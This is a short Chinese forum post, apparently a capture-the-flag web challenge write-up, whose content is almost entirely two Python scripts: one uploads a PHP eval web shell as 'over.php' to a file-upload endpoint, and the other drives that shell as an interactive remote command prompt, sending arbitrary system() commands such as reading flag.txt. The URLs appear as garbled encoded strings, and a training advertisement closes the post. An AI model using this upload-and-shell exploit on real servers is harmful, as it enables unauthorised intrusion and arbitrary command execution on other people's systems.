不会php,不会web题

上网查的，现学现卖，东抄抄西抄抄就有下面的脚本了

bb3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8X3u0D9L8$3N6K6i4K6u0W2j5$3!0E0i4K6u0r3N6s2t1I4M7r3I4W2i4K6u0r3M7q4)9J5c8U0p5I4x3K6l9I4y4K6b7K6i4K6u0W2K9s2c8E0L8l9`.`.

然后改吧改吧就是下面的这种

import json
url="a78K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7%4i4K6u0W2x3e0l9J5i4K6u0W2x3U0t1K6i4K6u0W2x3e0N6Q4x3@1p5J5x3K6x3K6i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3U0k6I4N6h3!0@1i4K6y4n7
data1 = {"a":"<?php eval(@$_POST['a']); ?>"}
data2 = json.dumps(data1)
data=data2
files=[('file',('over.php',data))]
print requests.post(url=url,files=files).content

貌似网上的菜刀不好用，自己瞎写个脚本

# -*- coding=utf-8 -*-
import string
import requests
url='1c7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7%4i4K6u0W2x3e0l9J5i4K6u0W2x3U0t1K6i4K6u0W2x3e0N6Q4x3@1p5J5x3K6x3K6i4K6u0r3N6i4m8D9L8$3q4V1i4K6u0r3x3U0l9^5y4U0b7&6x3o6l9%4y4W2)9J5k6i4m8Z5M7q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7
#username=admin&password=admin
def post(mys,data):
	#data={"username":"admin","password":"123456"}
	res = mys.post(url, data=data).content
	return res
def exp():

	mys=requests.session()
	data={"a":"echo system(\"ls -l\");echo system(\"cat flag.txt\");"}
	while 1:
		cmd=raw_input('$:')
		data={"a":"echo system(\""+cmd+"\");"}
		ret=post(mys,data)
		get=ret.decode('gbk', "ignore")
		print get
	#print ret
	get=ret.decode('gbk', "ignore")
	print get
if __name__=="__main__":
	exp()

全靠ccfer带躺

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课